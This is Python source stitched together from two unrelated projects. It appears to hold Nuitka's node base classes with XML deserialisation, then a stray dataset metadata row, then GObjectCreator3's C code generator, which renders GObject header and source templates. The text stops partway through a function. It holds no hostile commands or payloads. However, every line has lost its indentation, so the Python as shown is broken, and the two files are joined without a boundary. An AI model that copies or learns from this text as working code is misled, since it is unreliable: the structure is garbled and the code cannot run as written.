role.append(children.asXml())
else:
role.attrib["type"] = "list"
for child in children:
role.append(child.asXml())
return result
@classmethod
def fromXML(cls, provider, source_ref, **args):
# Only some things need a provider, pylint: disable=unused-argument
return cls(source_ref=source_ref, **args)
def asXmlText(self):
xml = self.asXml()
return TreeXML.toString(xml)
def dump(self, level=0):
Tracing.printIndented(level, self)
Tracing.printSeparator(level)
for visitable in self.getVisitableNodes():
visitable.dump(level + 1)
Tracing.printSeparator(level)
@staticmethod
def isStatementsFrame():
return False
@staticmethod
def isCompiledPythonModule():
# For overload by module nodes
return False
def isExpression(self):
return self.kind.startswith("EXPRESSION_")
def isStatement(self):
return self.kind.startswith("STATEMENT_")
def isExpressionBuiltin(self):
return self.kind.startswith("EXPRESSION_BUILTIN_")
@staticmethod
def isExpressionConstantRef():
return False
@staticmethod
def isExpressionOperationUnary():
return False
@staticmethod
def isExpressionOperationBinary():
return False
@staticmethod
def isExpressionOperationInplace():
return False
@staticmethod
def isExpressionComparison():
return False
@staticmethod
def isExpressionSideEffects():
return False
@staticmethod
def isExpressionMakeSequence():
return False
@staticmethod
def isNumberConstant():
return False
@staticmethod
def isExpressionCall():
return False
@staticmethod
def isExpressionFunctionBodyBase():
return False
@staticmethod
def isExpressionOutlineFunctionBase():
return False
def visit(self, context, visitor):
visitor(self)
for visitable in self.getVisitableNodes():
visitable.visit(context, visitor)
@staticmethod
def getVisitableNodes():
return ()
@staticmethod
def getVisitableNodesNamed():
"""Named children dictionary.
For use in debugging and XML output.
"""
return ()
@staticmethod
def getName():
"""Name of the node if any."""
return None
@staticmethod
def mayHaveSideEffects():
"""Unless we are told otherwise, everything may have a side effect."""
return True
def isOrderRelevant(self):
return self.mayHaveSideEffects()
def extractSideEffects(self):
"""Unless defined otherwise, the expression is the side effect."""
return (self,)
@staticmethod
def mayRaiseException(exception_type):
"""Unless we are told otherwise, everything may raise everything."""
# Virtual method, pylint: disable=unused-argument
return True
@staticmethod
def mayReturn():
"""May this node do a return exit, to be overloaded for things that might."""
return False
@staticmethod
def mayBreak():
return False
@staticmethod
def mayContinue():
return False
def needsFrame(self):
"""Unless we are tolder otherwise, this depends on exception raise."""
return self.mayRaiseException(BaseException)
@staticmethod
def willRaiseException(exception_type):
"""Unless we are told otherwise, nothing may raise anything."""
# Virtual method, pylint: disable=unused-argument
return False
@staticmethod
def isStatementAborting():
"""Is the node aborting, control flow doesn't continue after this node."""
return False
class CodeNodeMixin(object):
    # Mixins are not allowed to specify slots, pylint: disable=assigning-non-slot
__slots__ = ()
def __init__(self, name, code_prefix):
assert name is not None
self.name = name
self.code_prefix = code_prefix
# The code name is determined on demand only.
self.code_name = None
# The "UID" values of children kinds are kept here.
self.uids = {}
def getName(self):
return self.name
def getCodeName(self):
if self.code_name is None:
provider = self.getParentVariableProvider().getEntryPoint()
parent_name = provider.getCodeName()
uid = "_%d" % provider.getChildUID(self)
assert isinstance(self, CodeNodeMixin)
if self.name:
name = uid + "_" + self.name.strip("<>")
else:
name = uid
if str is not bytes:
name = name.encode("ascii", "c_identifier").decode()
self.code_name = "%s$$$%s_%s" % (parent_name, self.code_prefix, name)
return self.code_name
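    # Illustrative example (names assumed): a body named "f" with code_prefix
    # "function" and child UID 1 under a provider named "module" would get a
    # code name like "module$$$function__1_f".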
def getChildUID(self, node):
if node.kind not in self.uids:
self.uids[node.kind] = 0
self.uids[node.kind] += 1
return self.uids[node.kind]
class ChildrenHavingMixin(object):
    # Mixins are not allowed to specify slots.
__slots__ = ()
named_children = ()
checkers = {}
def __init__(self, values):
assert (
type(self.named_children) is tuple and self.named_children
), self.named_children
# TODO: Make this true.
# assert len(self.named_children) > 1, self.kind
# Check for completeness of given values, everything should be there
# but of course, might be put to None.
if set(values.keys()) != set(self.named_children):
raise NuitkaNodeDesignError(
"Must pass named children in value dictionary",
set(values.keys()),
set(self.named_children),
)
for name, value in values.items():
if name in self.checkers:
value = self.checkers[name](value)
if type(value) is tuple:
assert None not in value, name
for val in value:
val.parent = self
elif value is None:
pass
else:
value.parent = self
attr_name = "subnode_" + name
setattr(self, attr_name, value)
def setChild(self, name, value):
"""Set a child value.
        Do not overload, provide self.checkers instead.
"""
# Only accept legal child names
assert name in self.named_children, name
# Lists as inputs are OK, but turn them into tuples.
if type(value) is list:
value = tuple(value)
if name in self.checkers:
value = self.checkers[name](value)
# Re-parent value to us.
if type(value) is tuple:
for val in value:
val.parent = self
elif value is not None:
value.parent = self
attr_name = "subnode_" + name
# Determine old value, and inform it about losing its parent.
old_value = getattr(self, attr_name)
assert old_value is not value, value
setattr(self, attr_name, value)
def clearChild(self, name):
# Only accept legal child names
assert name in self.named_children, name
if name in self.checkers:
self.checkers[name](None)
attr_name = "subnode_" + name
# Determine old value, and inform it about losing its parent.
old_value = getattr(self, attr_name)
assert old_value is not None
setattr(self, attr_name, None)
def getChild(self, name):
attr_name = "subnode_" + name
return getattr(self, attr_name)
def getVisitableNodes(self):
# TODO: Consider if a generator would be faster.
result = []
for name in self.named_children:
attr_name = "subnode_" + name
value = getattr(self, attr_name)
if value is None:
pass
elif type(value) is tuple:
result += list(value)
elif isinstance(value, NodeBase):
result.append(value)
else:
raise AssertionError(
self, "has illegal child", name, value, value.__class__
)
return tuple(result)
def getVisitableNodesNamed(self):
"""Named children dictionary.
For use in debugging and XML output.
"""
for name in self.named_children:
attr_name = "subnode_" + name
value = getattr(self, attr_name)
yield name, value
def replaceChild(self, old_node, new_node):
if new_node is not None and not isinstance(new_node, NodeBase):
raise AssertionError(
"Cannot replace with", new_node, "old", old_node, "in", self
)
        # Find the replaced node. As an added difficulty, the old node may
        # be an element of a tuple, in which case passing None as the new
        # node removes that element.
for key in self.named_children:
value = self.getChild(key)
if value is None:
pass
elif type(value) is tuple:
if old_node in value:
if new_node is not None:
self.setChild(
key,
tuple(
(val if val is not old_node else new_node)
for val in value
),
)
else:
self.setChild(
key, tuple(val for val in value if val is not old_node)
)
return key
elif isinstance(value, NodeBase):
if old_node is value:
self.setChild(key, new_node)
return key
else:
assert False, (key, value, value.__class__)
raise AssertionError("Didn't find child", old_node, "in", self)
def getCloneArgs(self):
values = {}
for key in self.named_children:
value = self.getChild(key)
assert type(value) is not list, key
if value is None:
values[key] = None
elif type(value) is tuple:
values[key] = tuple(v.makeClone() for v in value)
else:
values[key] = value.makeClone()
values.update(self.getDetails())
return values
def finalize(self):
del self.parent
for c in self.getVisitableNodes():
c.finalize()
class ClosureGiverNodeMixin(CodeNodeMixin):
"""Base class for nodes that provide variables for closure takers."""
    # Mixins are not allowed to specify slots, pylint: disable=assigning-non-slot
__slots__ = ()
def __init__(self, name, code_prefix):
CodeNodeMixin.__init__(self, name=name, code_prefix=code_prefix)
self.temp_variables = {}
self.temp_scopes = {}
self.preserver_id = 0
def hasProvidedVariable(self, variable_name):
return self.locals_scope.hasProvidedVariable(variable_name)
def getProvidedVariable(self, variable_name):
if not self.locals_scope.hasProvidedVariable(variable_name):
variable = self.createProvidedVariable(variable_name=variable_name)
self.locals_scope.registerProvidedVariable(variable)
return self.locals_scope.getProvidedVariable(variable_name)
@abstractmethod
def createProvidedVariable(self, variable_name):
"""Create a variable provided by this function."""
def allocateTempScope(self, name):
self.temp_scopes[name] = self.temp_scopes.get(name, 0) + 1
return "%s_%d" % (name, self.temp_scopes[name])
def allocateTempVariable(self, temp_scope, name, temp_type=None):
if temp_scope is not None:
full_name = "%s__%s" % (temp_scope, name)
else:
assert name != "result"
full_name = name
# No duplicates please.
assert full_name not in self.temp_variables, full_name
result = self.createTempVariable(temp_name=full_name, temp_type=temp_type)
# Late added temp variables should be treated with care for the
# remaining trace.
if self.trace_collection is not None:
self.trace_collection.initVariableUnknown(result).addUsage()
return result
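    # For example, allocateTempVariable("try_1", "value") creates and returns
    # a temp variable with the full name "try_1__value".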
def createTempVariable(self, temp_name, temp_type):
if temp_name in self.temp_variables:
return self.temp_variables[temp_name]
if temp_type is None:
temp_class = Variables.TempVariable
elif temp_type == "bool":
temp_class = Variables.TempVariableBool
else:
assert False, temp_type
result = temp_class(owner=self, variable_name=temp_name)
self.temp_variables[temp_name] = result
return result
def getTempVariable(self, temp_scope, name):
if temp_scope is not None:
full_name = "%s__%s" % (temp_scope, name)
else:
full_name = name
return self.temp_variables[full_name]
def getTempVariables(self):
return self.temp_variables.values()
def _removeTempVariable(self, variable):
del self.temp_variables[variable.getName()]
def optimizeUnusedTempVariables(self):
remove = []
for temp_variable in self.getTempVariables():
empty = self.trace_collection.hasEmptyTraces(variable=temp_variable)
if empty:
remove.append(temp_variable)
for temp_variable in remove:
self._removeTempVariable(temp_variable)
def allocatePreserverId(self):
if python_version >= 0x300:
self.preserver_id += 1
return self.preserver_id
class ClosureTakerMixin(object):
"""Mixin for nodes that accept variables from closure givers."""
    # Mixins are not allowed to specify slots, pylint: disable=assigning-non-slot
__slots__ = ()
def __init__(self, provider):
self.provider = provider
self.taken = set()
def getParentVariableProvider(self):
return self.provider
def getClosureVariable(self, variable_name):
result = self.provider.getVariableForClosure(variable_name=variable_name)
assert result is not None, variable_name
if not result.isModuleVariable():
self.addClosureVariable(result)
return result
def addClosureVariable(self, variable):
self.taken.add(variable)
return variable
def getClosureVariables(self):
return tuple(
sorted(
[take for take in self.taken if not take.isModuleVariable()],
key=lambda x: x.getName(),
)
)
def getClosureVariableIndex(self, variable):
closure_variables = self.getClosureVariables()
for count, closure_variable in enumerate(closure_variables):
if variable is closure_variable:
return count
raise IndexError(variable)
def hasTakenVariable(self, variable_name):
for variable in self.taken:
if variable.getName() == variable_name:
return True
return False
def getTakenVariable(self, variable_name):
for variable in self.taken:
if variable.getName() == variable_name:
return variable
return None
class StatementBase(NodeBase):
"""Base class for all statements."""
# Base classes can be abstract, pylint: disable=abstract-method
# TODO: Have them all.
# @abstractmethod
@staticmethod
def getStatementNiceName():
return "undescribed statement"
def computeStatementSubExpressions(self, trace_collection):
"""Compute a statement.
Default behavior is to just visit the child expressions first, and
then the node "computeStatement". For a few cases this needs to
be overloaded.
"""
expressions = self.getVisitableNodes()
for count, expression in enumerate(expressions):
assert expression.isExpression(), (self, expression)
expression = trace_collection.onExpression(expression=expression)
if expression.willRaiseException(BaseException):
wrapped_expression = makeStatementOnlyNodesFromExpressions(
expressions[: count + 1]
)
assert wrapped_expression is not None
return (
wrapped_expression,
"new_raise",
lambda: "For %s the child expression '%s' will raise."
% (self.getStatementNiceName(), expression.getChildNameNice()),
)
return self, None, None
class StatementChildrenHavingBase(ChildrenHavingMixin, StatementBase):
def __init__(self, values, source_ref):
StatementBase.__init__(self, source_ref=source_ref)
ChildrenHavingMixin.__init__(self, values=values)
class StatementChildHavingBase(StatementBase):
named_child = ""
checker = None
def __init__(self, value, source_ref):
StatementBase.__init__(self, source_ref=source_ref)
assert type(self.named_child) is str and self.named_child
if self.checker is not None:
value = self.checker(value) # False alarm, pylint: disable=not-callable
assert type(value) is not list, self.named_child
if type(value) is tuple:
assert None not in value, self.named_child
for val in value:
val.parent = self
        elif value is not None:
            value.parent = self
attr_name = "subnode_" + self.named_child
setattr(self, attr_name, value)
def setChild(self, name, value):
"""Set a child value.
        Do not overload, provide self.checker instead.
"""
# Only accept legal child names
assert name == self.named_child, name
# Lists as inputs are OK, but turn them into tuples.
if type(value) is list:
value = tuple(value)
if self.checker is not None:
value = self.checker(value) # False alarm, pylint: disable=not-callable
# Re-parent value to us.
if type(value) is tuple:
for val in value:
val.parent = self
elif value is not None:
value.parent = self
attr_name = "subnode_" + name
# Determine old value, and inform it about losing its parent.
old_value = getattr(self, attr_name)
assert old_value is not value, value
setattr(self, attr_name, value)
def getChild(self, name):
# Only accept legal child names
attr_name = "subnode_" + name
return getattr(self, attr_name)
def getVisitableNodes(self):
# TODO: Consider if a generator would be faster.
attr_name = "subnode_" + self.named_child
value = getattr(self, attr_name)
if value is None:
return ()
elif type(value) is tuple:
return value
elif isinstance(value, NodeBase):
return (value,)
else:
raise AssertionError(self, "has illegal child", value, value.__class__)
def getVisitableNodesNamed(self):
"""Named children dictionary.
For use in debugging and XML output.
"""
attr_name = "subnode_" + self.named_child
value = getattr(self, attr_name)
yield self.named_child, value
def replaceChild(self, old_node, new_node):
if new_node is not None and not isinstance(new_node, NodeBase):
raise AssertionError(
"Cannot replace with", new_node, "old", old_node, "in", self
)
        # Find the replaced node. As an added difficulty, the old node may
        # be an element of a tuple, in which case passing None as the new
        # node removes that element.
key = self.named_child
value = self.getChild(key)
if value is None:
pass
elif type(value) is tuple:
if old_node in value:
if new_node is not None:
self.setChild(
key,
tuple(
(val if val is not old_node else new_node) for val in value
),
)
else:
self.setChild(
key, tuple(val for val in value if val is not old_node)
)
return key
elif isinstance(value, NodeBase):
if old_node is value:
self.setChild(key, new_node)
return key
else:
assert False, (key, value, value.__class__)
raise AssertionError("Didn't find child", old_node, "in", self)
def getCloneArgs(self):
# Make clones of child nodes too.
values = {}
key = self.named_child
value = self.getChild(key)
assert type(value) is not list, key
if value is None:
values[key] = None
elif type(value) is tuple:
values[key] = tuple(v.makeClone() for v in value)
else:
values[key] = value.makeClone()
values.update(self.getDetails())
return values
def finalize(self):
del self.parent
attr_name = "subnode_" + self.named_child
child = getattr(self, attr_name)
if child is not None:
child.finalize()
delattr(self, attr_name)
class SideEffectsFromChildrenMixin(object):
    # Mixins are not allowed to specify slots.
__slots__ = ()
def mayHaveSideEffects(self):
for child in self.getVisitableNodes():
if child.mayHaveSideEffects():
return True
return False
def extractSideEffects(self):
# No side effects at all but from the children.
result = []
for child in self.getVisitableNodes():
result.extend(child.extractSideEffects())
return tuple(result)
def computeExpressionDrop(self, statement, trace_collection):
# Expression only statement plays no role, pylint: disable=unused-argument
side_effects = self.extractSideEffects()
# TODO: Have a method for nicer output and remove existing overloads
# by using classes and prefer generic implementation here.
if side_effects:
return (
makeStatementOnlyNodesFromExpressions(side_effects),
"new_statements",
"Lowered unused expression %s to its side effects." % self.kind,
)
else:
return (
None,
"new_statements",
"Removed %s without side effects." % self.kind,
)
def makeChild(provider, child, source_ref):
child_type = child.attrib.get("type")
if child_type == "list":
return [
fromXML(provider=provider, xml=sub_child, source_ref=source_ref)
for sub_child in child
]
elif child_type == "none":
return None
else:
return fromXML(provider=provider, xml=child[0], source_ref=source_ref)
def getNodeClassFromKind(kind):
return NodeCheckMetaClass.kinds[kind]
def extractKindAndArgsFromXML(xml, source_ref):
kind = xml.attrib["kind"]
args = dict(xml.attrib)
del args["kind"]
if source_ref is None:
source_ref = SourceCodeReference.fromFilenameAndLine(
args["filename"], int(args["line"])
)
del args["filename"]
del args["line"]
else:
source_ref = source_ref.atLineNumber(int(args["line"]))
del args["line"]
node_class = getNodeClassFromKind(kind)
return kind, node_class, args, source_ref
def fromXML(provider, xml, source_ref=None):
assert xml.tag == "node", xml
kind, node_class, args, source_ref = extractKindAndArgsFromXML(xml, source_ref)
if "constant" in args:
# TODO: Try and reduce/avoid this, use marshal and/or pickle from a file
# global stream instead. For now, this will do. pylint: disable=eval-used
args["constant"] = eval(args["constant"])
if kind in (
"ExpressionFunctionBody",
"PythonMainModule",
"PythonCompiledModule",
"PythonCompiledPackage",
"PythonInternalModule",
):
delayed = node_class.named_children
if "code_flags" in args:
args["future_spec"] = fromFlags(args["code_flags"])
else:
delayed = ()
for child in xml:
assert child.tag == "role", child.tag
child_name = child.attrib["name"]
        # Might want to wait until the provider is updated with some
        # children. In these cases, we pass the XML node, rather
        # than a Nuitka node.
if child_name not in delayed:
args[child_name] = makeChild(provider, child, source_ref)
else:
args[child_name] = child
try:
return node_class.fromXML(provider=provider, source_ref=source_ref, **args)
except (TypeError, AttributeError):
Tracing.printLine(node_class, args, source_ref)
raise
| apache-2.0 | 8,789,145,488,713,669,000 | 28.308013 | 88 | 0.594856 | false |
ThomasBollmeier/GObjectCreator3 | src/gobjcreator3/codegen/c_code_generator.py | 1 | 29821 | from gobjcreator3.codegen.code_generator import CodeGenerator
from gobjcreator3.codegen.output import StdOut
from gobjcreator3.codegen.name_creator import NameCreator
from gobjcreator3.codegen.c_marshaller_generator import CMarshallerGenerator, CMarshallerNameCreator
from gobjcreator3.model.type import Type
from gobjcreator3.model.visibility import Visibility
from gobjcreator3.model.method import Parameter
from gobjcreator3.model.property import PropType, PropAccess
from gobjcreator3.model.ginterface import GInterface
import os
import re
import faberscriptorum
class CGenConfig(object):
def __init__(self):
self.generate_base_functions = False
self.generate_constructor = False
self.generate_setter_getter = False
self.verbose = False
self.header_text_file = ""
self.directory_per_module = True
class CCodeGenerator(CodeGenerator):
def __init__(self, root_module, origin, out=StdOut(), config=CGenConfig()):
CodeGenerator.__init__(self, root_module, origin, out)
self._config = config
self._dir_stack = []
self._cur_dir = ""
self._name_creator = NameCreator()
self._template_dir = os.path.dirname(__file__) + os.sep + "templates" + os.sep + "c"
self._refresh_template_processor()
self._regex_type_w_ptrs = re.compile(r"(\w+)(\s*)(\*+)")
def generate(self):
self._generate_module(self._root_module)
def _generate_module(self, module):
if self._config.directory_per_module:
if self._cur_dir:
self._cur_dir += os.sep + module.name
else:
self._cur_dir = module.name
self._dir_stack.append(self._cur_dir)
self._out.enter_dir(self._cur_dir)
for m in module.modules:
self._generate_module(m)
self._refresh_template_processor()
self._setup_module_symbols(module)
objs = [obj for obj in module.objects if obj.filepath_origin == self._origin]
for obj in objs:
self._setup_gobject_symbols(obj)
self._gen_object_header(obj)
self._gen_object_prot_header(obj)
self._gen_object_source(obj)
if obj.has_signals():
self._gen_object_marshallers(obj)
intfs = [intf for intf in module.interfaces if intf.filepath_origin == self._origin]
for intf in intfs:
self._setup_ginterface_symbols(intf)
self._gen_interface_header(intf)
self._gen_interface_source(intf)
if intf.signals:
self._gen_object_marshallers(intf)
enums = [enum for enum in module.enumerations if enum.filepath_origin == self._origin]
for enum in enums:
self._setup_genum_symbols(enum)
self._gen_enum_header(enum)
self._gen_enum_source(enum)
all_flags = [flags for flags in module.flags if flags.filepath_origin == self._origin]
for flags in all_flags:
self._setup_gflags_symbols(flags)
self._gen_flags_header(flags)
self._gen_flags_source(flags)
error_domains = [error_domain for error_domain in module.error_domains if error_domain.filepath_origin == self._origin]
for error_domain in error_domains:
self._setup_gerror_symbols(error_domain)
self._gen_error_header(error_domain)
if self._config.directory_per_module:
self._out.exit_dir(self._cur_dir)
self._dir_stack.pop()
if self._dir_stack:
self._cur_dir = self._dir_stack[-1]
else:
self._cur_dir = ""
def _gen_object_header(self, obj):
file_path = self._full_path(self._name_creator.create_obj_header_name(obj))
lines = self._get_lines_from_template("gobject_header.template", file_path)
self._create_text_file(file_path, lines)
def _gen_object_prot_header(self, obj):
if not obj.has_protected_members() and obj.is_final:
return
file_path = self._full_path(self._name_creator.create_obj_prot_header_name(obj))
lines = self._get_lines_from_template("gobject_header_prot.template", file_path)
self._create_text_file(file_path, lines)
def _gen_object_source(self, obj):
file_path = self._full_path(self._name_creator.create_obj_source_name(obj))
lines = self._get_lines_from_template("gobject_source.template", file_path)
self._create_text_file(file_path, lines)
def _gen_interface_header(self, intf):
file_path = self._full_path(self._name_creator.create_obj_header_name(intf))
lines = self._get_lines_from_template("ginterface_header.template", file_path)
self._create_text_file(file_path, lines)
def _gen_interface_source(self, intf):
file_path = self._full_path(self._name_creator.create_obj_source_name(intf))
lines = self._get_lines_from_template("ginterface_source.template", file_path)
self._create_text_file(file_path, lines)
def _gen_object_marshallers(self, clif):
is_interface = isinstance(clif, GInterface)
header_guard = "__"
modprefix = self._template_processor.getSymbol("MODULE_PREFIX")
if modprefix:
header_guard += modprefix + "_"
if not is_interface:
header_guard += self._template_processor.getSymbol("CLASS_NAME")
else:
header_guard += self._template_processor.getSymbol("INTF_NAME")
header_guard += "_MARSHALLER_H__"
if not is_interface:
prefix = self._template_processor.getSymbol("class_prefix")
else:
prefix = self._template_processor.getSymbol("intf_prefix")
signals = clif.get_signals()
generator = CMarshallerGenerator(
self._header_comment(),
header_guard,
prefix,
signals,
self._out
)
header_file_path = self._full_path(self._name_creator.create_obj_marshaller_header_name(clif))
if self._config.verbose:
print("generating %s..." % header_file_path, end="")
generator.generate_header(header_file_path)
if self._config.verbose:
print("done")
source_file_path = self._full_path(self._name_creator.create_obj_marshaller_source_name(clif))
if self._config.verbose:
print("generating %s..." % source_file_path, end="")
generator.generate_source(source_file_path)
if self._config.verbose:
print("done")
def _gen_enum_header(self, enum):
file_path = self._full_path(self._name_creator.create_filename_wo_suffix(enum) + ".h")
lines = self._get_lines_from_template("genum_header.template", file_path)
self._create_text_file(file_path, lines)
def _gen_enum_source(self, enum):
file_path = self._full_path(self._name_creator.create_filename_wo_suffix(enum) + ".c")
lines = self._get_lines_from_template("genum_source.template", file_path)
self._create_text_file(file_path, lines)
def _gen_flags_header(self, flags):
file_path = self._full_path(self._name_creator.create_filename_wo_suffix(flags) + ".h")
lines = self._get_lines_from_template("gflags_header.template", file_path)
self._create_text_file(file_path, lines)
def _gen_flags_source(self, flags):
file_path = self._full_path(self._name_creator.create_filename_wo_suffix(flags) + ".c")
lines = self._get_lines_from_template("gflags_source.template", file_path)
self._create_text_file(file_path, lines)
def _gen_error_header(self, error_domain):
file_path = self._full_path(self._name_creator.create_filename_wo_suffix(error_domain) + ".h")
lines = self._get_lines_from_template("gerror_header.template", file_path)
self._create_text_file(file_path, lines)
def _full_path(self, basename):
if self._cur_dir:
return self._cur_dir + os.sep + basename
else:
return basename
def _create_text_file(self, file_path, lines):
if self._config.verbose:
print("generating %s..." % file_path, end="")
self._out.visit_text_file(file_path, lines)
if self._config.verbose:
print("done")
def _get_lines_from_template(self, template_file, file_path):
self._out.prepare_file_creation(file_path, self._template_processor)
template_path = self._template_dir + os.sep + template_file
template_path = os.path.abspath(template_path)
out_buffer = self._template_processor.createStringOut()
self._template_processor.createCode(template_path, out_buffer)
lines = out_buffer.content.split(os.linesep)
# Remove adjacent empty lines:
res = []
prev = None
for line in lines:
line = line.rstrip()
if line:
res.append(line)
else:
if prev is None or prev:
res.append(line)
prev = line
return res
def _refresh_template_processor(self):
self._template_processor = faberscriptorum.API()
self._template_processor.setEditableSectionStyle(self._template_processor.Language.C)
self._template_processor.setIncludePath([self._template_dir])
self._template_processor["header_comment"] = self._header_comment()
self._template_processor["config"] = self._config
self._template_processor["TRUE"] = True
self._template_processor["FALSE"] = False
self._template_processor["PUBLIC"] = Visibility.PUBLIC
self._template_processor["PROTECTED"] = Visibility.PROTECTED
self._template_processor["PRIVATE"] = Visibility.PRIVATE
self._template_processor["OBJECT"] = Type.OBJECT
self._template_processor["INTERFACE"] = Type.INTERFACE
self._template_processor["type_name"] = self._name_creator.create_full_type_name
self._template_processor["TYPE_MACRO"] = self._name_creator.create_type_macro
self._template_processor["CAST_MACRO"] = self._name_creator.create_cast_macro
self._template_processor["increment"] = self._increment
self._template_processor["is_empty"] = self._is_empty
self._template_processor["is_none"] = self._is_none
self._template_processor["literal_trim"] = self._literal_trim
self._template_processor["length"] = self._length
self._template_processor["to_upper"] = self._to_upper
self._template_processor["to_lower"] = self._to_lower
self._template_processor["rearrange_asterisk"] = self._rearrange_asterisk
self._template_processor["method_basename"] = self._method_basename
self._template_processor["method_result"] = self._method_result
self._template_processor["method_signature"] = self._method_signature
self._template_processor["method_signature_by_name"] = self._method_signature_by_name
self._template_processor["method_by_name"] = self._method_by_name
self._template_processor["method_call_args"] = self._method_call_args
self._template_processor["method_def_class"] = self._method_def_class
self._template_processor["method_def_class_cast"] = self._method_def_class_cast
def _setup_module_symbols(self, module):
camel_case_prefix = module.name.capitalize()
curmod = module
while curmod.module:
curmod = curmod.module
if curmod.name:
camel_case_prefix = curmod.name.capitalize() + camel_case_prefix
prefix = self._name_creator.replace_camel_case(camel_case_prefix, "_")
self._template_processor["module_prefix"] = self._module_prefix(module)
self._template_processor["MODULE_PREFIX"] = prefix.upper()
self._template_processor["ModulePrefix"] = camel_case_prefix
self._template_processor["filename_wo_suffix"] = self._name_creator.create_filename_wo_suffix
def _setup_gobject_symbols(self, obj):
self._template_processor["class"] = obj
self._template_processor["ClassName"] = obj.name
self._template_processor["CLASS_NAME"] = self._name_creator.replace_camel_case(obj.name, "_").upper()
self._template_processor["FullClassName"] = self._template_processor.getSymbol("ModulePrefix") + obj.name
prefix = obj.cfunc_prefix or self._name_creator.replace_camel_case(obj.name, "_").lower()
module_prefix = self._template_processor.getSymbol("module_prefix")
if module_prefix:
prefix = module_prefix + "_" + prefix
self._template_processor["class_prefix"] = prefix
self._template_processor["protected_header"] = self._name_creator.create_obj_prot_header_name
self._template_processor["marshaller_header"] = self._name_creator.create_obj_marshaller_header_name
self._template_processor["hasProtectedMembers"] = obj.has_protected_members()
self._template_processor["PROP_NAME"] = self._name_creator.create_property_enum_value
self._template_processor["prop_tech_name"] = self._name_creator.create_property_tech_name
self._template_processor["PropType"] = PropType
self._template_processor["PropAccess"] = PropAccess
self._template_processor["prop_value"] = self._property_value
self._template_processor["prop_gtype"] = self._property_gtype
self._template_processor["prop_flags"] = self._property_flags
self._template_processor["prop_setter_section"] = self._property_setter_section
self._template_processor["prop_getter_section"] = self._property_getter_section
self._template_processor["prop_set_section"] = self._property_setter_section
self._template_processor["prop_get_section"] = self._property_getter_section
self._template_processor["is_prop_init_required"] = self._is_property_init_required
self._template_processor["signal_tech_name"] = self._signal_technical_name
self._template_processor["signal_section_defhandler"] = self._signal_section_defhandler
if obj.has_signals():
self._marshaller_names = CMarshallerNameCreator(prefix)
self._template_processor["marshaller_func"] = self._marshaller_names.create_marshaller_name
else:
self._marshaller_names = None
self._template_processor["interface_impl_funcname"] = self._interface_impl_funcname
def _setup_ginterface_symbols(self, intf):
self._template_processor["intf"] = intf
self._template_processor["INTF_NAME"] = self._name_creator.replace_camel_case(intf.name, "_").upper()
prefix = intf.cfunc_prefix or self._name_creator.replace_camel_case(intf.name, "_").lower()
module_prefix = self._template_processor.getSymbol("module_prefix")
if module_prefix:
prefix = module_prefix + "_" + prefix
self._template_processor["intf_prefix"] = prefix
if intf.signals:
self._marshaller_names = CMarshallerNameCreator(prefix)
self._template_processor["marshaller_func"] = self._marshaller_names.create_marshaller_name
else:
self._marshaller_names = None
def _setup_genum_symbols(self, enum):
self._template_processor["enum"] = enum
self._template_processor["ENUM_NAME"] = self._name_creator.replace_camel_case(enum.name, "_").upper()
self._template_processor["FullEnumName"] = self._template_processor.getSymbol("ModulePrefix") + enum.name
prefix = self._name_creator.replace_camel_case(enum.name, "_").lower()
module_prefix = self._template_processor.getSymbol("module_prefix")
if module_prefix:
prefix = module_prefix + "_" + prefix
self._template_processor["enum_prefix"] = prefix
def _setup_gflags_symbols(self, flags):
self._template_processor["flags"] = flags
prefix = self._name_creator.replace_camel_case(flags.name, "_").lower()
module_prefix = self._template_processor.getSymbol("module_prefix")
if module_prefix:
prefix = module_prefix + "_" + prefix
self._template_processor["flags_prefix"] = prefix
def _setup_gerror_symbols(self, error_domain):
self._template_processor["error_domain"] = error_domain
prefix = self._name_creator.replace_camel_case(error_domain.name, "_").lower()
module_prefix = self._template_processor.getSymbol("module_prefix")
if module_prefix:
prefix = module_prefix + "_" + prefix
self._template_processor["error_domain_prefix"] = prefix
def _header_comment(self):
if not self._config.header_text_file:
return """/*
* This file has been automatically generated by GObjectCreator3
* (see https://github.com/ThomasBollmeier/GObjectCreator3 for details)
*/
"""
else:
res = ""
f = open(self._config.header_text_file)
lines = f.readlines()
            f.close()
for line in lines:
res += line
return res
def _increment(self, value):
return value + 1
def _is_empty(self, data):
        return not data
def _is_none(self, data):
return data is None
def _to_upper(self, text):
return text.upper()
def _to_lower(self, text):
return text.lower()
def _literal_trim(self, text):
if len(text) > 2:
return text[1:-1]
else:
return ""
def _length(self, data):
        return len(data)
def _method_result(self, method):
result_type = "void"
for p in method.parameters:
type_name = self._name_creator.create_full_type_name(p.type)
if isinstance(p.type, Type) and ( p.type.category == Type.OBJECT or p.type.category == Type.INTERFACE ):
type_name += "*"
if "const" in p.modifiers:
type_name = "const " + type_name
if p.direction == Parameter.OUT:
result_type = type_name
break
return self._rearrange_asterisk(result_type)
def _method_basename(self,
cls,
method_info
):
method_or_name, intf = method_info
if not isinstance(method_or_name, str):
res = method_or_name.name
else:
res = method_or_name
if intf:
method_prefix = intf.cfunc_prefix or intf.name.lower()
mod_prefix = self._module_prefix_relative(intf.module, cls.module)
if mod_prefix:
method_prefix = mod_prefix + "_" + method_prefix
res = method_prefix + "_" + res
return res
def _method_signature(self,
cls,
method,
suppress_param_names=False,
insert_line_breaks=True,
indent_level=1,
instance_name="self"
):
res = ""
params = []
for p in method.parameters:
type_name = self._name_creator.create_full_type_name(p.type)
if isinstance(p.type, Type) and ( p.type.category == Type.OBJECT or p.type.category == Type.INTERFACE ):
type_name += "*"
if "const" in p.modifiers:
type_name = "const " + type_name
if p.direction != Parameter.OUT:
params.append((type_name, p.name))
if not method.is_static:
cls_type = self._name_creator.create_full_type_name(cls)
params.insert(0, (cls_type + "*", instance_name))
if len(params) == 0:
res = "void"
elif len(params) == 1:
res = params[0][0]
if not suppress_param_names:
res = self._rearrange_asterisk(res, params[0][1])
else:
for param in params:
if res:
res += ", "
if insert_line_breaks:
res += "\n"
res += indent_level * "\t"
typename = param[0]
if not suppress_param_names:
res += self._rearrange_asterisk(typename, param[1])
else:
res += typename
if insert_line_breaks:
res += "\n"
res += indent_level * "\t"
return res
def _method_call_args(self,
method,
insert_line_breaks = True,
indent_level = 1,
instance_name = "self"
):
args = [p.name for p in method.parameters if p.direction != Parameter.OUT]
if not method.is_static:
args.insert(0, instance_name)
num_args = len(args)
if num_args == 0:
res = ""
elif num_args == 1:
res = args[0]
else:
res = ""
for arg in args:
if res:
res += ","
if insert_line_breaks:
res += "\n"
res += indent_level * "\t"
res += arg
if insert_line_breaks:
res += "\n"
